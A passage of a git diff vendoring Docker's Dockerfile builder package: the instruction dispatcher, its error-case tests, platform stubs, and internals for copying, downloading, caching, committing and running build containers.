should be respected. +// +// Please see the jump table targets for the actual invocations, most of which +// will call out to the functions in internals.go to deal with their tasks. +// +// ONBUILD is a special case, which is covered in the onbuild() func in +// dispatchers.go. 
+// +// The evaluator uses the concept of "steps", which are usually each processable +// line in the Dockerfile. Each step is numbered and certain actions are taken +// before and after each step, such as creating an image ID and removing temporary +// containers and images. Note that ONBUILD creates a kinda-sorta "sub run" which +// includes its own set of steps (usually only one of them). +package dockerfile + +import ( + "fmt" + "strings" + + "github.com/docker/docker/builder/dockerfile/command" + "github.com/docker/docker/builder/dockerfile/parser" +) + +// Environment variable interpolation will happen on these statements only. +var replaceEnvAllowed = map[string]bool{ + command.Env: true, + command.Label: true, + command.Add: true, + command.Copy: true, + command.Workdir: true, + command.Expose: true, + command.Volume: true, + command.User: true, + command.StopSignal: true, + command.Arg: true, +} + +// Certain commands are allowed to have their args split into more +// words after env var replacements. Meaning: +// ENV foo="123 456" +// EXPOSE $foo +// should result in the same thing as: +// EXPOSE 123 456 +// and not treat "123 456" as a single word. +// Note that: EXPOSE "$foo" and EXPOSE $foo are not the same thing. +// Quotes will cause it to still be treated as single word. 
+var allowWordExpansion = map[string]bool{ + command.Expose: true, +} + +var evaluateTable map[string]func(*Builder, []string, map[string]bool, string) error + +func init() { + evaluateTable = map[string]func(*Builder, []string, map[string]bool, string) error{ + command.Add: add, + command.Arg: arg, + command.Cmd: cmd, + command.Copy: dispatchCopy, // copy() is a go builtin + command.Entrypoint: entrypoint, + command.Env: env, + command.Expose: expose, + command.From: from, + command.Healthcheck: healthcheck, + command.Label: label, + command.Maintainer: maintainer, + command.Onbuild: onbuild, + command.Run: run, + command.Shell: shell, + command.StopSignal: stopSignal, + command.User: user, + command.Volume: volume, + command.Workdir: workdir, + } +} + +// This method is the entrypoint to all statement handling routines. +// +// Almost all nodes will have this structure: +// Child[Node, Node, Node] where Child is from parser.Node.Children and each +// node comes from parser.Node.Next. This forms a "line" with a statement and +// arguments and we process them in this normalized form by hitting +// evaluateTable with the leaf nodes of the command and the Builder object. +// +// ONBUILD is a special case; in this case the parser will emit: +// Child[Node, Child[Node, Node...]] where the first node is the literal +// "onbuild" and the child entrypoint is the command of the ONBUILD statement, +// such as `RUN` in ONBUILD RUN foo. There is special case logic in here to +// deal with that, at least until it becomes more of a general concern with new +// features. +func (b *Builder) dispatch(stepN int, stepTotal int, ast *parser.Node) error { + cmd := ast.Value + upperCasedCmd := strings.ToUpper(cmd) + + // To ensure the user is given a decent error message if the platform + // on which the daemon is running does not support a builder command. 
+ if err := platformSupports(strings.ToLower(cmd)); err != nil { + return err + } + + attrs := ast.Attributes + original := ast.Original + flags := ast.Flags + strList := []string{} + msg := fmt.Sprintf("Step %d/%d : %s", stepN+1, stepTotal, upperCasedCmd) + + if len(ast.Flags) > 0 { + msg += " " + strings.Join(ast.Flags, " ") + } + + if cmd == "onbuild" { + if ast.Next == nil { + return fmt.Errorf("ONBUILD requires at least one argument") + } + ast = ast.Next.Children[0] + strList = append(strList, ast.Value) + msg += " " + ast.Value + + if len(ast.Flags) > 0 { + msg += " " + strings.Join(ast.Flags, " ") + } + + } + + // count the number of nodes that we are going to traverse first + // so we can pre-create the argument and message array. This speeds up the + // allocation of those list a lot when they have a lot of arguments + cursor := ast + var n int + for cursor.Next != nil { + cursor = cursor.Next + n++ + } + msgList := make([]string, n) + + var i int + // Append the build-time args to config-environment. + // This allows builder config to override the variables, making the behavior similar to + // a shell script i.e. `ENV foo bar` overrides value of `foo` passed in build + // context. But `ENV foo $foo` will use the value from build context if one + // isn't already been defined by a previous ENV primitive. + // Note, we get this behavior because we know that ProcessWord() will + // stop on the first occurrence of a variable name and not notice + // a subsequent one. So, putting the buildArgs list after the Config.Env + // list, in 'envs', is safe. + envs := b.runConfig.Env + for key, val := range b.options.BuildArgs { + if !b.isBuildArgAllowed(key) { + // skip build-args that are not in allowed list, meaning they have + // not been defined by an "ARG" Dockerfile command yet. 
+ // This is an error condition but only if there is no "ARG" in the entire + // Dockerfile, so we'll generate any necessary errors after we parsed + // the entire file (see 'leftoverArgs' processing in evaluator.go ) + continue + } + envs = append(envs, fmt.Sprintf("%s=%s", key, *val)) + } + for ast.Next != nil { + ast = ast.Next + var str string + str = ast.Value + if replaceEnvAllowed[cmd] { + var err error + var words []string + + if allowWordExpansion[cmd] { + words, err = ProcessWords(str, envs, b.directive.EscapeToken) + if err != nil { + return err + } + strList = append(strList, words...) + } else { + str, err = ProcessWord(str, envs, b.directive.EscapeToken) + if err != nil { + return err + } + strList = append(strList, str) + } + } else { + strList = append(strList, str) + } + msgList[i] = ast.Value + i++ + } + + msg += " " + strings.Join(msgList, " ") + fmt.Fprintln(b.Stdout, msg) + + // XXX yes, we skip any cmds that are not valid; the parser should have + // picked these out already. + if f, ok := evaluateTable[cmd]; ok { + b.flags = NewBFlags() + b.flags.Args = flags + return f(b, strList, attrs, original) + } + + return fmt.Errorf("Unknown instruction: %s", upperCasedCmd) +} + +// checkDispatch does a simple check for syntax errors of the Dockerfile. +// Because some of the instructions can only be validated through runtime, +// arg, env, etc., this syntax check will not be complete and could not replace +// the runtime check. Instead, this function is only a helper that allows +// user to find out the obvious error in Dockerfile earlier on. +// onbuild bool: indicate if instruction XXX is part of `ONBUILD XXX` trigger +func (b *Builder) checkDispatch(ast *parser.Node, onbuild bool) error { + cmd := ast.Value + upperCasedCmd := strings.ToUpper(cmd) + + // To ensure the user is given a decent error message if the platform + // on which the daemon is running does not support a builder command. 
+ if err := platformSupports(strings.ToLower(cmd)); err != nil { + return err + } + + // The instruction itself is ONBUILD, we will make sure it follows with at + // least one argument + if upperCasedCmd == "ONBUILD" { + if ast.Next == nil { + return fmt.Errorf("ONBUILD requires at least one argument") + } + } + + // The instruction is part of ONBUILD trigger (not the instruction itself) + if onbuild { + switch upperCasedCmd { + case "ONBUILD": + return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed") + case "MAINTAINER", "FROM": + return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", upperCasedCmd) + } + } + + if _, ok := evaluateTable[cmd]; ok { + return nil + } + + return fmt.Errorf("Unknown instruction: %s", upperCasedCmd) +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go new file mode 100644 index 0000000000..4340a2f8ac --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go @@ -0,0 +1,197 @@ +package dockerfile + +import ( + "io/ioutil" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" +) + +type dispatchTestCase struct { + name, dockerfile, expectedError string + files map[string]string +} + +func init() { + reexec.Init() +} + +func initDispatchTestCases() []dispatchTestCase { + dispatchTestCases := []dispatchTestCase{{ + name: "copyEmptyWhitespace", + dockerfile: `COPY + quux \ + bar`, + expectedError: "COPY requires at least two arguments", + }, + { + name: "ONBUILD forbidden FROM", + dockerfile: "ONBUILD FROM scratch", + expectedError: "FROM isn't allowed as an ONBUILD trigger", + files: nil, + }, + { + name: "ONBUILD forbidden MAINTAINER", + dockerfile: "ONBUILD 
MAINTAINER docker.io", + expectedError: "MAINTAINER isn't allowed as an ONBUILD trigger", + files: nil, + }, + { + name: "ARG two arguments", + dockerfile: "ARG foo bar", + expectedError: "ARG requires exactly one argument", + files: nil, + }, + { + name: "MAINTAINER unknown flag", + dockerfile: "MAINTAINER --boo joe@example.com", + expectedError: "Unknown flag: boo", + files: nil, + }, + { + name: "ADD multiple files to file", + dockerfile: "ADD file1.txt file2.txt test", + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "JSON ADD multiple files to file", + dockerfile: `ADD ["file1.txt", "file2.txt", "test"]`, + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "Wildcard ADD multiple files to file", + dockerfile: "ADD file*.txt test", + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "Wildcard JSON ADD multiple files to file", + dockerfile: `ADD ["file*.txt", "test"]`, + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "COPY multiple files to file", + dockerfile: "COPY file1.txt file2.txt test", + expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "JSON COPY multiple files to file", + dockerfile: `COPY ["file1.txt", "file2.txt", "test"]`, + expectedError: "When using COPY with more than 
one source file, the destination must be a directory and end with a /", + files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, + }, + { + name: "ADD multiple files to file with whitespace", + dockerfile: `ADD [ "test file1.txt", "test file2.txt", "test" ]`, + expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"}, + }, + { + name: "COPY multiple files to file with whitespace", + dockerfile: `COPY [ "test file1.txt", "test file2.txt", "test" ]`, + expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", + files: map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"}, + }, + { + name: "COPY wildcard no files", + dockerfile: `COPY file*.txt /tmp/`, + expectedError: "No source files were specified", + files: nil, + }, + { + name: "COPY url", + dockerfile: `COPY https://index.docker.io/robots.txt /`, + expectedError: "Source can't be a URL for COPY", + files: nil, + }, + { + name: "Chaining ONBUILD", + dockerfile: `ONBUILD ONBUILD RUN touch foobar`, + expectedError: "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed", + files: nil, + }, + { + name: "Invalid instruction", + dockerfile: `foo bar`, + expectedError: "Unknown instruction: FOO", + files: nil, + }} + + return dispatchTestCases +} + +func TestDispatch(t *testing.T) { + testCases := initDispatchTestCases() + + for _, testCase := range testCases { + executeTestCase(t, testCase) + } +} + +func executeTestCase(t *testing.T, testCase dispatchTestCase) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + for filename, content := range testCase.files { + createTestTempFile(t, contextDir, filename, content, 0777) + } + + tarStream, err := archive.Tar(contextDir, archive.Uncompressed) + + if err != nil { + t.Fatalf("Error when 
creating tar stream: %s", err) + } + + defer func() { + if err = tarStream.Close(); err != nil { + t.Fatalf("Error when closing tar stream: %s", err) + } + }() + + context, err := builder.MakeTarSumContext(tarStream) + + if err != nil { + t.Fatalf("Error when creating tar context: %s", err) + } + + defer func() { + if err = context.Close(); err != nil { + t.Fatalf("Error when closing tar context: %s", err) + } + }() + + r := strings.NewReader(testCase.dockerfile) + d := parser.Directive{} + parser.SetEscapeToken(parser.DefaultEscapeToken, &d) + n, err := parser.Parse(r, &d) + + if err != nil { + t.Fatalf("Error when parsing Dockerfile: %s", err) + } + + config := &container.Config{} + options := &types.ImageBuildOptions{} + + b := &Builder{runConfig: config, options: options, Stdout: ioutil.Discard, context: context} + + err = b.dispatch(0, len(n.Children), n.Children[0]) + + if err == nil { + t.Fatalf("No error when executing test %s", testCase.name) + } + + if !strings.Contains(err.Error(), testCase.expectedError) { + t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", testCase.expectedError, err.Error()) + } + +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go new file mode 100644 index 0000000000..28fd5b156b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go @@ -0,0 +1,9 @@ +// +build !windows + +package dockerfile + +// platformSupports is a short-term function to give users a quality error +// message if a Dockerfile uses a command not supported on the platform. 
+func platformSupports(command string) error { + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go new file mode 100644 index 0000000000..72483a2ec8 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go @@ -0,0 +1,13 @@ +package dockerfile + +import "fmt" + +// platformSupports gives users a quality error message if a Dockerfile uses +// a command not supported on the platform. +func platformSupports(command string) error { + switch command { + case "stopsignal": + return fmt.Errorf("The daemon on this platform does not support the command '%s'", command) + } + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals.go b/vendor/github.com/docker/docker/builder/dockerfile/internals.go new file mode 100644 index 0000000000..6f0a367842 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals.go @@ -0,0 +1,669 @@ +package dockerfile + +// internals for handling commands. Covers many areas and a lot of +// non-contiguous functionality. Please read the comments. 
+ +import ( + "crypto/sha256" + "encoding/hex" + "errors" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/url" + "os" + "path/filepath" + "sort" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/pkg/tarsum" + "github.com/docker/docker/pkg/urlutil" + "github.com/docker/docker/runconfig/opts" +) + +func (b *Builder) commit(id string, autoCmd strslice.StrSlice, comment string) error { + if b.disableCommit { + return nil + } + if b.image == "" && !b.noBaseImage { + return fmt.Errorf("Please provide a source image with `from` prior to commit") + } + b.runConfig.Image = b.image + + if id == "" { + cmd := b.runConfig.Cmd + b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) ", comment)) + defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + + hit, err := b.probeCache() + if err != nil { + return err + } else if hit { + return nil + } + id, err = b.create() + if err != nil { + return err + } + } + + // Note: Actually copy the struct + autoConfig := *b.runConfig + autoConfig.Cmd = autoCmd + + commitCfg := &backend.ContainerCommitConfig{ + ContainerCommitConfig: types.ContainerCommitConfig{ + Author: b.maintainer, + Pause: true, + Config: &autoConfig, + }, + } + + // Commit the container + imageID, err := b.docker.Commit(id, commitCfg) + if err != nil { + return err + } + + b.image = imageID + return 
nil +} + +type copyInfo struct { + builder.FileInfo + decompress bool +} + +func (b *Builder) runContextCommand(args []string, allowRemote bool, allowLocalDecompression bool, cmdName string) error { + if b.context == nil { + return fmt.Errorf("No context given. Impossible to use %s", cmdName) + } + + if len(args) < 2 { + return fmt.Errorf("Invalid %s format - at least two arguments required", cmdName) + } + + // Work in daemon-specific filepath semantics + dest := filepath.FromSlash(args[len(args)-1]) // last one is always the dest + + b.runConfig.Image = b.image + + var infos []copyInfo + + // Loop through each src file and calculate the info we need to + // do the copy (e.g. hash value if cached). Don't actually do + // the copy until we've looked at all src files + var err error + for _, orig := range args[0 : len(args)-1] { + var fi builder.FileInfo + decompress := allowLocalDecompression + if urlutil.IsURL(orig) { + if !allowRemote { + return fmt.Errorf("Source can't be a URL for %s", cmdName) + } + fi, err = b.download(orig) + if err != nil { + return err + } + defer os.RemoveAll(filepath.Dir(fi.Path())) + decompress = false + infos = append(infos, copyInfo{fi, decompress}) + continue + } + // not a URL + subInfos, err := b.calcCopyInfo(cmdName, orig, allowLocalDecompression, true) + if err != nil { + return err + } + + infos = append(infos, subInfos...) 
+ } + + if len(infos) == 0 { + return fmt.Errorf("No source files were specified") + } + if len(infos) > 1 && !strings.HasSuffix(dest, string(os.PathSeparator)) { + return fmt.Errorf("When using %s with more than one source file, the destination must be a directory and end with a /", cmdName) + } + + // For backwards compat, if there's just one info then use it as the + // cache look-up string, otherwise hash 'em all into one + var srcHash string + var origPaths string + + if len(infos) == 1 { + fi := infos[0].FileInfo + origPaths = fi.Name() + if hfi, ok := fi.(builder.Hashed); ok { + srcHash = hfi.Hash() + } + } else { + var hashs []string + var origs []string + for _, info := range infos { + fi := info.FileInfo + origs = append(origs, fi.Name()) + if hfi, ok := fi.(builder.Hashed); ok { + hashs = append(hashs, hfi.Hash()) + } + } + hasher := sha256.New() + hasher.Write([]byte(strings.Join(hashs, ","))) + srcHash = "multi:" + hex.EncodeToString(hasher.Sum(nil)) + origPaths = strings.Join(origs, " ") + } + + cmd := b.runConfig.Cmd + b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), fmt.Sprintf("#(nop) %s %s in %s ", cmdName, srcHash, dest))) + defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + + if hit, err := b.probeCache(); err != nil { + return err + } else if hit { + return nil + } + + container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig}) + if err != nil { + return err + } + b.tmpContainers[container.ID] = struct{}{} + + comment := fmt.Sprintf("%s %s in %s", cmdName, origPaths, dest) + + // Twiddle the destination when its a relative path - meaning, make it + // relative to the WORKINGDIR + if dest, err = normaliseDest(cmdName, b.runConfig.WorkingDir, dest); err != nil { + return err + } + + for _, info := range infos { + if err := b.docker.CopyOnBuild(container.ID, dest, info.FileInfo, info.decompress); err != nil { + return err + } + } + + return b.commit(container.ID, cmd, comment) +} + 
+func (b *Builder) download(srcURL string) (fi builder.FileInfo, err error) { + // get filename from URL + u, err := url.Parse(srcURL) + if err != nil { + return + } + path := filepath.FromSlash(u.Path) // Ensure in platform semantics + if strings.HasSuffix(path, string(os.PathSeparator)) { + path = path[:len(path)-1] + } + parts := strings.Split(path, string(os.PathSeparator)) + filename := parts[len(parts)-1] + if filename == "" { + err = fmt.Errorf("cannot determine filename from url: %s", u) + return + } + + // Initiate the download + resp, err := httputils.Download(srcURL) + if err != nil { + return + } + + // Prepare file in a tmp dir + tmpDir, err := ioutils.TempDir("", "docker-remote") + if err != nil { + return + } + defer func() { + if err != nil { + os.RemoveAll(tmpDir) + } + }() + tmpFileName := filepath.Join(tmpDir, filename) + tmpFile, err := os.OpenFile(tmpFileName, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600) + if err != nil { + return + } + + stdoutFormatter := b.Stdout.(*streamformatter.StdoutFormatter) + progressOutput := stdoutFormatter.StreamFormatter.NewProgressOutput(stdoutFormatter.Writer, true) + progressReader := progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Downloading") + // Download and dump result to tmp file + if _, err = io.Copy(tmpFile, progressReader); err != nil { + tmpFile.Close() + return + } + fmt.Fprintln(b.Stdout) + // ignoring error because the file was already opened successfully + tmpFileSt, err := tmpFile.Stat() + if err != nil { + tmpFile.Close() + return + } + + // Set the mtime to the Last-Modified header value if present + // Otherwise just remove atime and mtime + mTime := time.Time{} + + lastMod := resp.Header.Get("Last-Modified") + if lastMod != "" { + // If we can't parse it then just let it default to 'zero' + // otherwise use the parsed time value + if parsedMTime, err := http.ParseTime(lastMod); err == nil { + mTime = parsedMTime + } + } + + tmpFile.Close() + + if err = 
system.Chtimes(tmpFileName, mTime, mTime); err != nil { + return + } + + // Calc the checksum, even if we're using the cache + r, err := archive.Tar(tmpFileName, archive.Uncompressed) + if err != nil { + return + } + tarSum, err := tarsum.NewTarSum(r, true, tarsum.Version1) + if err != nil { + return + } + if _, err = io.Copy(ioutil.Discard, tarSum); err != nil { + return + } + hash := tarSum.Sum(nil) + r.Close() + return &builder.HashedFileInfo{FileInfo: builder.PathFileInfo{FileInfo: tmpFileSt, FilePath: tmpFileName}, FileHash: hash}, nil +} + +func (b *Builder) calcCopyInfo(cmdName, origPath string, allowLocalDecompression, allowWildcards bool) ([]copyInfo, error) { + + // Work in daemon-specific OS filepath semantics + origPath = filepath.FromSlash(origPath) + + if origPath != "" && origPath[0] == os.PathSeparator && len(origPath) > 1 { + origPath = origPath[1:] + } + origPath = strings.TrimPrefix(origPath, "."+string(os.PathSeparator)) + + // Deal with wildcards + if allowWildcards && containsWildcards(origPath) { + var copyInfos []copyInfo + if err := b.context.Walk("", func(path string, info builder.FileInfo, err error) error { + if err != nil { + return err + } + if info.Name() == "" { + // Why are we doing this check? + return nil + } + if match, _ := filepath.Match(origPath, path); !match { + return nil + } + + // Note we set allowWildcards to false in case the name has + // a * in it + subInfos, err := b.calcCopyInfo(cmdName, path, allowLocalDecompression, false) + if err != nil { + return err + } + copyInfos = append(copyInfos, subInfos...) 
+ return nil + }); err != nil { + return nil, err + } + return copyInfos, nil + } + + // Must be a dir or a file + + statPath, fi, err := b.context.Stat(origPath) + if err != nil { + return nil, err + } + + copyInfos := []copyInfo{{FileInfo: fi, decompress: allowLocalDecompression}} + + hfi, handleHash := fi.(builder.Hashed) + if !handleHash { + return copyInfos, nil + } + + // Deal with the single file case + if !fi.IsDir() { + hfi.SetHash("file:" + hfi.Hash()) + return copyInfos, nil + } + // Must be a dir + var subfiles []string + err = b.context.Walk(statPath, func(path string, info builder.FileInfo, err error) error { + if err != nil { + return err + } + // we already checked handleHash above + subfiles = append(subfiles, info.(builder.Hashed).Hash()) + return nil + }) + if err != nil { + return nil, err + } + + sort.Strings(subfiles) + hasher := sha256.New() + hasher.Write([]byte(strings.Join(subfiles, ","))) + hfi.SetHash("dir:" + hex.EncodeToString(hasher.Sum(nil))) + + return copyInfos, nil +} + +func (b *Builder) processImageFrom(img builder.Image) error { + if img != nil { + b.image = img.ImageID() + + if img.RunConfig() != nil { + b.runConfig = img.RunConfig() + } + } + + // Check to see if we have a default PATH, note that windows won't + // have one as its set by HCS + if system.DefaultPathEnv != "" { + // Convert the slice of strings that represent the current list + // of env vars into a map so we can see if PATH is already set. 
+ // If its not set then go ahead and give it our default value + configEnv := opts.ConvertKVStringsToMap(b.runConfig.Env) + if _, ok := configEnv["PATH"]; !ok { + b.runConfig.Env = append(b.runConfig.Env, + "PATH="+system.DefaultPathEnv) + } + } + + if img == nil { + // Typically this means they used "FROM scratch" + return nil + } + + // Process ONBUILD triggers if they exist + if nTriggers := len(b.runConfig.OnBuild); nTriggers != 0 { + word := "trigger" + if nTriggers > 1 { + word = "triggers" + } + fmt.Fprintf(b.Stderr, "# Executing %d build %s...\n", nTriggers, word) + } + + // Copy the ONBUILD triggers, and remove them from the config, since the config will be committed. + onBuildTriggers := b.runConfig.OnBuild + b.runConfig.OnBuild = []string{} + + // parse the ONBUILD triggers by invoking the parser + for _, step := range onBuildTriggers { + ast, err := parser.Parse(strings.NewReader(step), &b.directive) + if err != nil { + return err + } + + total := len(ast.Children) + for _, n := range ast.Children { + if err := b.checkDispatch(n, true); err != nil { + return err + } + } + for i, n := range ast.Children { + if err := b.dispatch(i, total, n); err != nil { + return err + } + } + } + + return nil +} + +// probeCache checks if cache match can be found for current build instruction. +// If an image is found, probeCache returns `(true, nil)`. +// If no image is found, it returns `(false, nil)`. +// If there is any error, it returns `(false, err)`. 
+func (b *Builder) probeCache() (bool, error) { + c := b.imageCache + if c == nil || b.options.NoCache || b.cacheBusted { + return false, nil + } + cache, err := c.GetCache(b.image, b.runConfig) + if err != nil { + return false, err + } + if len(cache) == 0 { + logrus.Debugf("[BUILDER] Cache miss: %s", b.runConfig.Cmd) + b.cacheBusted = true + return false, nil + } + + fmt.Fprintf(b.Stdout, " ---> Using cache\n") + logrus.Debugf("[BUILDER] Use cached version: %s", b.runConfig.Cmd) + b.image = string(cache) + + return true, nil +} + +func (b *Builder) create() (string, error) { + if b.image == "" && !b.noBaseImage { + return "", fmt.Errorf("Please provide a source image with `from` prior to run") + } + b.runConfig.Image = b.image + + resources := container.Resources{ + CgroupParent: b.options.CgroupParent, + CPUShares: b.options.CPUShares, + CPUPeriod: b.options.CPUPeriod, + CPUQuota: b.options.CPUQuota, + CpusetCpus: b.options.CPUSetCPUs, + CpusetMems: b.options.CPUSetMems, + Memory: b.options.Memory, + MemorySwap: b.options.MemorySwap, + Ulimits: b.options.Ulimits, + } + + // TODO: why not embed a hostconfig in builder? 
+ hostConfig := &container.HostConfig{ + SecurityOpt: b.options.SecurityOpt, + Isolation: b.options.Isolation, + ShmSize: b.options.ShmSize, + Resources: resources, + NetworkMode: container.NetworkMode(b.options.NetworkMode), + } + + config := *b.runConfig + + // Create the container + c, err := b.docker.ContainerCreate(types.ContainerCreateConfig{ + Config: b.runConfig, + HostConfig: hostConfig, + }) + if err != nil { + return "", err + } + for _, warning := range c.Warnings { + fmt.Fprintf(b.Stdout, " ---> [Warning] %s\n", warning) + } + + b.tmpContainers[c.ID] = struct{}{} + fmt.Fprintf(b.Stdout, " ---> Running in %s\n", stringid.TruncateID(c.ID)) + + // override the entry point that may have been picked up from the base image + if err := b.docker.ContainerUpdateCmdOnBuild(c.ID, config.Cmd); err != nil { + return "", err + } + + return c.ID, nil +} + +var errCancelled = errors.New("build cancelled") + +func (b *Builder) run(cID string) (err error) { + errCh := make(chan error) + go func() { + errCh <- b.docker.ContainerAttachRaw(cID, nil, b.Stdout, b.Stderr, true) + }() + + finished := make(chan struct{}) + cancelErrCh := make(chan error, 1) + go func() { + select { + case <-b.clientCtx.Done(): + logrus.Debugln("Build cancelled, killing and removing container:", cID) + b.docker.ContainerKill(cID, 0) + b.removeContainer(cID) + cancelErrCh <- errCancelled + case <-finished: + cancelErrCh <- nil + } + }() + + if err := b.docker.ContainerStart(cID, nil, "", ""); err != nil { + close(finished) + if cancelErr := <-cancelErrCh; cancelErr != nil { + logrus.Debugf("Build cancelled (%v) and got an error from ContainerStart: %v", + cancelErr, err) + } + return err + } + + // Block on reading output from container, stop on err or chan closed + if err := <-errCh; err != nil { + close(finished) + if cancelErr := <-cancelErrCh; cancelErr != nil { + logrus.Debugf("Build cancelled (%v) and got an error from errCh: %v", + cancelErr, err) + } + return err + } + + if ret, _ := 
b.docker.ContainerWait(cID, -1); ret != 0 { + close(finished) + if cancelErr := <-cancelErrCh; cancelErr != nil { + logrus.Debugf("Build cancelled (%v) and got a non-zero code from ContainerWait: %d", + cancelErr, ret) + } + // TODO: change error type, because jsonmessage.JSONError assumes HTTP + return &jsonmessage.JSONError{ + Message: fmt.Sprintf("The command '%s' returned a non-zero code: %d", strings.Join(b.runConfig.Cmd, " "), ret), + Code: ret, + } + } + close(finished) + return <-cancelErrCh +} + +func (b *Builder) removeContainer(c string) error { + rmConfig := &types.ContainerRmConfig{ + ForceRemove: true, + RemoveVolume: true, + } + if err := b.docker.ContainerRm(c, rmConfig); err != nil { + fmt.Fprintf(b.Stdout, "Error removing intermediate container %s: %v\n", stringid.TruncateID(c), err) + return err + } + return nil +} + +func (b *Builder) clearTmp() { + for c := range b.tmpContainers { + if err := b.removeContainer(c); err != nil { + return + } + delete(b.tmpContainers, c) + fmt.Fprintf(b.Stdout, "Removing intermediate container %s\n", stringid.TruncateID(c)) + } +} + +// readDockerfile reads a Dockerfile from the current context. +func (b *Builder) readDockerfile() error { + // If no -f was specified then look for 'Dockerfile'. If we can't find + // that then look for 'dockerfile'. If neither are found then default + // back to 'Dockerfile' and use that in the error message. 
+ if b.options.Dockerfile == "" { + b.options.Dockerfile = builder.DefaultDockerfileName + if _, _, err := b.context.Stat(b.options.Dockerfile); os.IsNotExist(err) { + lowercase := strings.ToLower(b.options.Dockerfile) + if _, _, err := b.context.Stat(lowercase); err == nil { + b.options.Dockerfile = lowercase + } + } + } + + err := b.parseDockerfile() + + if err != nil { + return err + } + + // After the Dockerfile has been parsed, we need to check the .dockerignore + // file for either "Dockerfile" or ".dockerignore", and if either are + // present then erase them from the build context. These files should never + // have been sent from the client but we did send them to make sure that + // we had the Dockerfile to actually parse, and then we also need the + // .dockerignore file to know whether either file should be removed. + // Note that this assumes the Dockerfile has been read into memory and + // is now safe to be removed. + if dockerIgnore, ok := b.context.(builder.DockerIgnoreContext); ok { + dockerIgnore.Process([]string{b.options.Dockerfile}) + } + return nil +} + +func (b *Builder) parseDockerfile() error { + f, err := b.context.Open(b.options.Dockerfile) + if err != nil { + if os.IsNotExist(err) { + return fmt.Errorf("Cannot locate specified Dockerfile: %s", b.options.Dockerfile) + } + return err + } + defer f.Close() + if f, ok := f.(*os.File); ok { + // ignoring error because Open already succeeded + fi, err := f.Stat() + if err != nil { + return fmt.Errorf("Unexpected error reading Dockerfile: %v", err) + } + if fi.Size() == 0 { + return fmt.Errorf("The Dockerfile (%s) cannot be empty", b.options.Dockerfile) + } + } + b.dockerfile, err = parser.Parse(f, &b.directive) + if err != nil { + return err + } + + return nil +} + +// determine if build arg is part of built-in args or user +// defined args in Dockerfile at any point in time. 
